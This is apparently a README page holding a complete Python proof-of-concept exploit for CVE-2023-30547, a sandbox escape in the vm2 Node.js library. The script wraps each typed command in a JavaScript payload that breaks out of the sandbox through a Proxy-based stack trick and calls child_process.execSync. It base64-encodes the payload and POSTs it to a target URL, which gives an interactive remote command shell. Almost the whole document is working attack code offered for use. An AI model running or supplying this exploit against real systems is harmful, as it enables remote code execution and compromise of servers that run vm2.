README.md
Rendering markdown...
#!/bin/python3
import requests
import base64
import sys
import cmd
import readline
import json
# CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
# Author : Ravindu Wickramasinghe | rvz
class ExploitShell(cmd.Cmd):
def __init__(self, url):
super().__init__()
self.url = url
def default(self, line):
cmd = line
payload = '''const {VM} = require("vm2");
const vm = new VM();
const code = `
cmd = "'''+cmd+'''";
err = {};
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy(err, handler);
try {
throw proxiedErr;
} catch ({constructor: c}) {
c.constructor('return process')().mainModule.require('child_process').execSync(cmd);
}
`
console.log(vm.run(code));'''
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
# update if needed
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/json',
'Connection': 'keep-alive',
}
# update if needed
json_data = {'code': encoded_payload}
try:
response = requests.post(self.url, headers=headers, json=json_data)
except:
print("[!] an error occurred!")
return
try:
values = list(json.loads(response.text).values())
print(values[0])
except json.JSONDecodeError:
print(response.text)
def do_exit(self, args):
print("exiting...")
return True
def main():
try:
url = sys.argv[1]
except IndexError:
print("usage: ./exploit.py <url>")
sys.exit(1)
shell = ExploitShell(url)
shell.prompt = "> "
shell.cmdloop()
if __name__ == "__main__":
main()